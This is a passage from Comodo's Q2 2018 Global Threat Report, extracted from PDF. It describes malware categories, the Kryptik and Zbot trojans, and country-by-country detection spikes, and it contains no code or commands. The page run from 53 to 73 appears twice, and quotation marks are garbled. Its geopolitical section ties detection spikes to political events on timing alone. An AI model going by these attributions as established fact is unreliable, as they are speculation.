For Q2 Alamar was the 1 constructor that Comodo detected Microsoft describes this program as a ldquoSevererdquo malware threat to PC users
In Q2 Germany (de) was the top country of detection for Constructors
And this timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks
Global Threat Report Q2 2018 Edition
Page 53 of 73
532 Packers Malware that is ldquopackedrdquo refers to any means used to hide or obfuscate malicious executable code by compressing or ldquopackingrdquo it within larger seemingly innocuous software and data streams The hostile code can even come in the form of scripts The compressed data often contains separate decompression code or even a self-extracting archive which is used to recreate the original code from the compressed code and then execute the malware Encryption may also be used to conceal the malware from security software as another means to obfuscate the attack
MUPX or the Modified ldquoUltimate Packer for Executablesrdquo dominated this part of the malware landscape MUPX is free open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm UCL that is just a few hundred bytes of code in length
In Q2 2018 Russia was the 1 home to malware Packers
This timeline shows that Russia had the most persistent Packer problems while Iran had the highest periodic spikes
Global Threat Report Q2 2018 Edition
Page 54 of 73
533 Email Flooder Email Flooders are malware used to overwhelm email servers with messages in order to ldquokillrdquo it or shut it down in a form of denial-of-service (DoS) attack
The one Email Flooder that Comodo detected in Q2 2018 was Palevo which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders
The primary country where Comodo detected this malicious behavior was in Germany
And this timeline shows that while the number of Palevo detections was not high it was still a persistent threat in Germany
Global Threat Report Q2 2018 Edition
Page 55 of 73
534 Virtual Tools Virtual Tools are programs that can modify or alter malicious files to avoid detection
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher AntiAV and RunFile
The top two countries for Virtual Tools detections were Germany and the US
This timeline shows that Germany had one particularly heavy infestation around the beginning of June while the US had two sharp spikes one at the start and the other at the end of Q2 2018
Global Threat Report Q2 2018 Edition
Page 56 of 73
535 Jokes ldquoJokerdquo malware is in fact just what it says these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time
Such malware is typically only labeled a ldquoMediumrdquo threat because the hackerrsquos intention is not to damage or destroy information but merely to have fun at the victimrsquos expense
Germany (de) and the US were the top two countries of detection for Joke malware
In this timeline you can see that this malware type is not numerous ndash but still something to be aware of
Global Threat Report Q2 2018 Edition
Page 57 of 73
54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications
Global Threat Report Q2 2018 Edition
Page 58 of 73
541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location
In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications
And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America
Global Threat Report Q2 2018 Edition
Page 59 of 73
542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more
The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo
As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018
And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US
Global Threat Report Q2 2018 Edition
Page 60 of 73
543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients
The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently
This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively
This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 50 of 73
524 Exploits Computer Exploits comprise software data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware Exploits can enable unauthorized access privilege escalation or denial-of-service (DoS)
The discovery of computer exploits can be rare as such vulnerabilities are typically patched and fixed quickly once they are discovered
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target Adobe Portable Document Format (pdf) files which were created in the 1990s to present documents in a common format independent of application software hardware and operating systems
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018 with Japan clearly experiencing the most persistent challenges
Global Threat Report Q2 2018 Edition
Page 51 of 73
53 Medium Threat Malware In this section we will focus on five malware types that are somewhat rarer and more exotic These include Email Flooders Constructors Jokes Virtual Tools and Malware Packers
Global Threat Report Q2 2018 Edition
Page 52 of 73
531 Constructor Constructors are applications that can be used to automatically create malware files
For Q2 Alamar was the 1 constructor that Comodo detected Microsoft describes this program as a ldquoSevererdquo malware threat to PC users
In Q2 Germany (de) was the top country of detection for Constructors
And this timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks
Global Threat Report Q2 2018 Edition
Page 53 of 73
532 Packers Malware that is ldquopackedrdquo refers to any means used to hide or obfuscate malicious executable code by compressing or ldquopackingrdquo it within larger seemingly innocuous software and data streams The hostile code can even come in the form of scripts The compressed data often contains separate decompression code or even a self-extracting archive which is used to recreate the original code from the compressed code and then execute the malware Encryption may also be used to conceal the malware from security software as another means to obfuscate the attack
MUPX or the Modified ldquoUltimate Packer for Executablesrdquo dominated this part of the malware landscape MUPX is free open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm UCL that is just a few hundred bytes of code in length
In Q2 2018 Russia was the 1 home to malware Packers
This timeline shows that Russia had the most persistent Packer problems while Iran had the highest periodic spikes
Global Threat Report Q2 2018 Edition
Page 54 of 73
533 Email Flooder Email Flooders are malware used to overwhelm email servers with messages in order to ldquokillrdquo it or shut it down in a form of denial-of-service (DoS) attack
The one Email Flooder that Comodo detected in Q2 2018 was Palevo which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders
The primary country where Comodo detected this malicious behavior was in Germany
And this timeline shows that while the number of Palevo detections was not high it was still a persistent threat in Germany
Global Threat Report Q2 2018 Edition
Page 55 of 73
534 Virtual Tools Virtual Tools are programs that can modify or alter malicious files to avoid detection
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher AntiAV and RunFile
The top two countries for Virtual Tools detections were Germany and the US
This timeline shows that Germany had one particularly heavy infestation around the beginning of June while the US had two sharp spikes one at the start and the other at the end of Q2 2018
Global Threat Report Q2 2018 Edition
Page 56 of 73
535 Jokes ldquoJokerdquo malware is in fact just what it says these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time
Such malware is typically only labeled a ldquoMediumrdquo threat because the hackerrsquos intention is not to damage or destroy information but merely to have fun at the victimrsquos expense
Germany (de) and the US were the top two countries of detection for Joke malware
In this timeline you can see that this malware type is not numerous ndash but still something to be aware of
Global Threat Report Q2 2018 Edition
Page 57 of 73
54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications
Global Threat Report Q2 2018 Edition
Page 58 of 73
541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location
In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications
And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America
Global Threat Report Q2 2018 Edition
Page 59 of 73
542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more
The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo
As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018
And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US
Global Threat Report Q2 2018 Edition
Page 60 of 73
543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients
The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently
This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively
This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
